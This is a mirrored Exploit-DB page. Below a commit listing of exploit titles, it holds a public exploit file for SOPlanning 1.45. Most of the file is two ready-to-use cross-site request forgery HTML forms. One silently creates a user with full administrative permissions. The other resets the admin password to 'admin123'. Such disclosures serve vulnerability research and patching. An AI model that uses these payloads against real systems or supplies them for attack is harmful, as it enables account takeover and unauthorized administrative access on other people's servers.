bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/48086.txt
Offensive Security 228a37da9c DB: 2020-02-18 
15 changes to exploits/shellcodes

HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
Cuckoo Clock v5.0 - Buffer Overflow

Anviz CrossChex - Buffer Overflow (Metasploit)
SOPlanning 1.45 - 'by' SQL Injection
Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting
Avaya Aura Communication Manager 5.2 - Remote Code Execution
Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
SOPlanning 1.45 - 'users' SQL Injection
LabVantage 8.3 - Information Disclosure
2020-02-18 05:01:54 +00:00

69 lines
No EOL
3.8 KiB
Text
Raw Blame History

# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling
# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary
# user creation and for changing passwords (Specifically the admin password)
# POC For aribtrary user creation:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormUser" />
<input type="hidden" name="xajaxr" value="1581700271752" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="1" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="Test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="&#35;FFFFFF" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><e><k>0<&#47;k><v>users&#95;manage&#95;all<&#47;v><&#47;e><e><k>1<&#47;k><v>projects&#95;manage&#95;all<&#47;v><&#47;e><e><k>2<&#47;k><v>projectgroups&#95;manage&#95;all<&#47;v><&#47;e><e><k>3<&#47;k><v>tasks&#95;modify&#95;all<&#47;v><&#47;e><e><k>4<&#47;k><v>tasks&#95;view&#95;all&#95;projects<&#47;v><&#47;e><e><k>5<&#47;k><v>tasks&#95;view&#95;all&#95;users<&#47;v><&#47;e><e><k>6<&#47;k><v>lieux&#95;all<&#47;v><&#47;e><e><k>7<&#47;k><v>ressources&#95;all<&#47;v><&#47;e><e><k>8<&#47;k><v>audit&#95;restore<&#47;v><&#47;e><e><k>9<&#47;k><v>parameters&#95;all<&#47;v><&#47;e><e><k>10<&#47;k><v>stats&#95;users<&#47;v><&#47;e><e><k>11<&#47;k><v>stats&#95;projects<&#47;v><&#47;e><&#47;xjxobj>" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><&#47;xjxobj>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# POC for admin password change:
# CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormProfil" />
<input type="hidden" name="xajaxr" value="1581702103306" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="ADM" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="admin123" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="fr" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="true" />
<input type="hidden" name="xajaxargs&#91;&#93;" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink